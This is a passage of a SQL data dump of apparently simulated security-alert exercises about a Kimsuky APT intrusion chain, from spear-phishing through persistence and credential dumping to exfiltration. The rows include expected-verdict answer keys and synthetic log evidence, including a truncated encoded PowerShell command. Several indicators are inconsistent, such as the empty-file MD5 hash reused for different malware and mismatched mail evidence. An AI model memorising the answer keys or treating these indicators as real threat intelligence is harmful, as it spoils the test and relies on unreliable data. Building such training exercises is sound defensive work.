detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:23Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.57\\\",\\\"filename\\\":\\\"nuclear_research_plans.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_tool_used\\\":\\\"custom_exfil_tool_v1.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:14.869Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:23Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.57\\\",\\\"filename\\\":\\\"nuclear_research_plans.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_tool_used\\\":\\\"custom_exfil_tool_v1.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:14.869Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:23Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.57\\\",\\\"filename\\\":\\\"nuclear_research_plans.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_tool_used\\\":\\\"custom_exfil_tool_v1.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:14.869Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:23Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.57\\\",\\\"filename\\\":\\\"nuclear_research_plans.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_tool_used\\\":\\\"custom_exfil_tool_v1.2\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:14.869Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:45:23Z\\\",\\\"event\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"192.168.45.12\\\",\\\"destination_ip\\\":\\\"203.0.113.57\\\",\\\"filename\\\":\\\"nuclear_research_plans.pdf\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"dlp_policy_triggered\\\":\\\"Sensitive Data Exfiltration\\\",\\\"malware_tool_used\\\":\\\"custom_exfil_tool_v1.2\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1481, 'Spear Phishing Attempt with Malicious HWP Attachment', 'high', 'Email Gateway Logs', 'A spear-phishing email containing a malicious HWP attachment was sent to an individual associated with a South Korean think tank. The email originated from a known malicious IP address linked to Kimsuky APT group.', 'Initial Access', 'T1566.001 - Spear Phishing Attachment', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T08:45:00Z\",\"email_subject\":\"Important Update on Seminar\",\"sender_email\":\"attacker@malicious-domain.com\",\"recipient_email\":\"victim@thinktank.kr\",\"attachment\":\"seminar_update.hwp\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.25\"}', '2026-03-15 19:07:24', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"attacker@malicious-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Tool X\",\"verdict\":\"malicious\",\"details\":\"Associated with Kimsuky APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as malicious HWP file\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP used by Kimsuky group\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Attempt with Malicious HWP Attachment\",\"date\":\"2026-03-15T20:58:14.876Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1482, 'Execution of GoldDragon Malware via HWP Exploit', 'critical', 'Endpoint Detection and Response (EDR)', 'The GoldDragon malware was executed on the victim\'s machine through a malicious HWP file containing an embedded exploit. This activity signifies a successful execution phase intended to establish a foothold in the system.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"EDR-5678\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.25\",\"user\":\"jdoe\",\"malware_name\":\"GoldDragon\",\"file_name\":\"malicious_file.hwp\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"execution_path\":\"C:\\\\Users\\\\jdoe\\\\Documents\\\\malicious_file.hwp\",\"process_id\":4321,\"alert_trigger\":{\"type\":\"exploit\",\"description\":\"HWP file exploit triggered GoldDragon execution\"}}', '2026-03-15 19:07:24', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by malware.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to GoldDragon malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_file.hwp\",\"is_critical\":false,\"osint_result\":{\"source\":\"Endpoint Logs\",\"verdict\":\"suspicious\",\"details\":\"File involved in exploit activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1483, 'Establishing Persistence with Registry Modifications', 'high', 'Registry Change Monitoring', 'The malware modifies the Windows Registry to ensure it runs on startup, allowing Kimsuky to regain control even after system reboots.', 'Persistence', 'T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:03:23Z\",\"event_id\":4657,\"user\":\"compromisedUser\",\"user_id\":\"S-1-5-21-1234567890-1234567890-1234567890-1001\",\"computer_name\":\"compromised-system\",\"registry_key\":\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"MaliciousStartup\",\"registry_value_data\":\"C:\\\\Users\\\\compromisedUser\\\\AppData\\\\Roaming\\\\malicious.exe\",\"process_name\":\"regedit.exe\",\"external_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.25\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-15 19:07:24', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Kimsuky APT group\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"regedit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File identified as a variant of Kimsuky malware\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Hash known to be associated with Kimsuky malware\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromisedUser\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User account on the compromised system\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:14.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:03:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"compromisedUser\\\",\\\"user_id\\\":\\\"S-1-5-21-1234567890-1234567890-1234567890-1001\\\",\\\"computer_name\\\":\\\"compromised-system\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromisedUser\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:14.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:03:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"compromisedUser\\\",\\\"user_id\\\":\\\"S-1-5-21-1234567890-1234567890-1234567890-1001\\\",\\\"computer_name\\\":\\\"compromised-system\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromisedUser\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:14.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:03:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"compromisedUser\\\",\\\"user_id\\\":\\\"S-1-5-21-1234567890-1234567890-1234567890-1001\\\",\\\"computer_name\\\":\\\"compromised-system\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromisedUser\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:14.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:03:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"compromisedUser\\\",\\\"user_id\\\":\\\"S-1-5-21-1234567890-1234567890-1234567890-1001\\\",\\\"computer_name\\\":\\\"compromised-system\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromisedUser\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:14.914Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:03:23Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"compromisedUser\\\",\\\"user_id\\\":\\\"S-1-5-21-1234567890-1234567890-1234567890-1001\\\",\\\"computer_name\\\":\\\"compromised-system\\\",\\\"registry_key\\\":\\\"HKCU\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousStartup\\\",\\\"registry_value_data\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromisedUser\\\\\\\\AppData\\\\\\\\Roaming\\\\\\\\malicious.exe\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.25\\\",\\\"md5_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1484, 'Credential Dumping for Lateral Movement', 'high', 'Network Traffic Analysis', 'Detection of suspicious network traffic indicating credential dumping activity by Kimsuky APT group. The attacker utilized a known credential dumping tool to exfiltrate credentials from the compromised host 192.168.1.15, targeting additional systems for lateral movement.', 'Lateral Movement', 'T1003 Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:55Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"10.0.0.5\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"admin_user\",\"dump_tool\":\"mimikatz.exe\",\"hash\":\"3f7851f1c1b8a8f5f6d9a2d4f5e5e5f6\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\mimikatz.exe\",\"alert_id\":\"ALERT-20231012-0004\",\"action\":\"credential_dumping_attempt\",\"protocol\":\"SMB\",\"signature\":\"Suspicious Credential Dumping Tool Detected\"}', '2026-03-15 19:07:25', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known Kimsuky APT infrastructure\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Credential dumping tool\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3f7851f1c1b8a8f5f6d9a2d4f5e5e5f6\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with mimikatz\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1485, 'Data Aggregation for Exfiltration', 'high', 'File Access Logs', 'The attackers aggregate sensitive documents and communications, focusing on information pertaining to North Korea, in preparation for data exfiltration.', 'Exfiltration Preparation', 'T1020', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:37:45Z\",\"event_id\":\"4356\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"username\":\"jdoe\",\"filename\":\"NK_sensitive_docs.zip\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"read\",\"status\":\"success\"}', '2026-03-15 19:07:25', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by the attacker to access sensitive files.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP address associated with exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"NK_sensitive_docs.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file aggregated for exfiltration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"suspicious\",\"details\":\"File hash associated with exfiltration attempts.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Compromised user account used for unauthorized access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:14.937Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:37:45Z\\\",\\\"event_id\\\":\\\"4356\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"NK_sensitive_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:14.937Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:37:45Z\\\",\\\"event_id\\\":\\\"4356\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"NK_sensitive_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:14.937Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:37:45Z\\\",\\\"event_id\\\":\\\"4356\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"NK_sensitive_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:14.937Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:37:45Z\\\",\\\"event_id\\\":\\\"4356\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"NK_sensitive_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:14.937Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:37:45Z\\\",\\\"event_id\\\":\\\"4356\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"203.0.113.5\\\",\\\"username\\\":\\\"jdoe\\\",\\\"filename\\\":\\\"NK_sensitive_docs.zip\\\",\\\"file_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"action\\\":\\\"read\\\",\\\"status\\\":\\\"success\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1486, 'Encrypted Data Exfiltration via C2 Channels', 'critical', 'Command and Control Traffic Logs', 'Anomalous encrypted data exfiltration detected via established C2 channels attributed to the Kimsuky group. The data exfiltration was observed from a compromised internal host to a known malicious external IP. The data was encrypted to avoid detection by network monitoring tools.', 'Exfiltration', 'T1041: Exfiltration Over C2 Channel', 1, 'new', NULL, '{\"timestamp\":\"2023-10-03T14:22:17Z\",\"source_ip\":\"192.168.10.15\",\"destination_ip\":\"185.22.57.200\",\"data_transferred\":\"3.5MB\",\"protocol\":\"HTTPS\",\"encryption\":\"AES-256\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malware_filename\":\"data_exfil_tool.exe\",\"user\":\"jdoe\",\"c2_domain\":\"malicious-c2.example.com\"}', '2026-03-15 19:07:25', '2026-03-15 20:58:14', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal IP\",\"verdict\":\"internal\",\"details\":\"Internal host suspected in data exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.22.57.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Kimsuky C2 infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known data exfiltration tool used by Kimsuky.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"data_exfil_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"suspicious\",\"details\":\"Executable used for data exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"clean\",\"details\":\"User account involved in the incident.\"}},{\"id\":\"artifact_6\",\"type\":\"domain\",\"value\":\"malicious-c2.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Domain Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Domain used for C2 communications by Kimsuky.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:14.954Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 